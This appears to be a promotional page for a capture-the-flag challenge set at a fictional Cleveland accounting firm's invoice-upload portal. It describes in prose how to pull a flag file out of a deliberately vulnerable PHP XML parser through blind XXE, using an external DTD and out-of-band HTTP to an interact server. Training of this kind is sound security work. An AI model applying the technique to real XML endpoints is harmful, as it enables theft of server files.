Margins & Sons CPA
Margins & Sons CPA accepts your invoice batch as an .xml upload, files it for processing, and tells you nothing else. Their bookkeeper is thorough — perhaps too thorough.
The Scenario
Margins & Sons CPA has filed quarterlies for mid-sized Cleveland firms since 1986 — three partners, a bullpen of CPAs, and a client portal the senior partner's nephew stood up in 2003 and has been "good enough" ever since. Clients submit their invoice batches as XML for processing, the receipt screen says "submitted for processing," and nothing else ever comes back. Whatever the portal does with the file after that is between the portal and the bookkeeper.
Challenge Intel
Synopsis
Blind XXE via external DTD parameter-entity exfiltration over OOB HTTP to the interact server.
What It Is
The /upload.php endpoint feeds the player-supplied XML straight into PHP's DOMDocument::loadXML with LIBXML_DTDLOAD | LIBXML_NOENT, while never reflecting parsed content in the response. To pull /flag.txt out, the player must host an external DTD on the interact server that uses the classic parameter-entity wrapper trick — read the flag with file://, embed it as a parameter to a second SYSTEM entity pointing at an interact URL, and trigger expansion from the submitted invoice. The flag arrives as a URL parameter in the interact server's HTTP request log.
Who It's For
Advanced testers comfortable with blind XXE, parameter entities, external DTD chaining, and out-of-band recovery.
Skills You'll Practice
- Blind XXE exploitation against PHP DOMDocument
- Crafting an external DTD that nests SYSTEM entities through parameter-entity expansion
- Out-of-band data exfiltration over HTTP
- Reading interact-server logs to recover exfiltrated data
- Reasoning about silent XML pipelines that never reflect content
What You'll Gain
- A working OOB XXE workflow end-to-end against a realistic upload endpoint
- A reusable external-DTD template for blind exfil
- Comfort using the platform's interact subdomain to recover flags from opaque servers
- A benchmark solve for serious XXE capability
Ready to hack Margins & Sons CPA?
This challenge is free. Sign up and start hacking.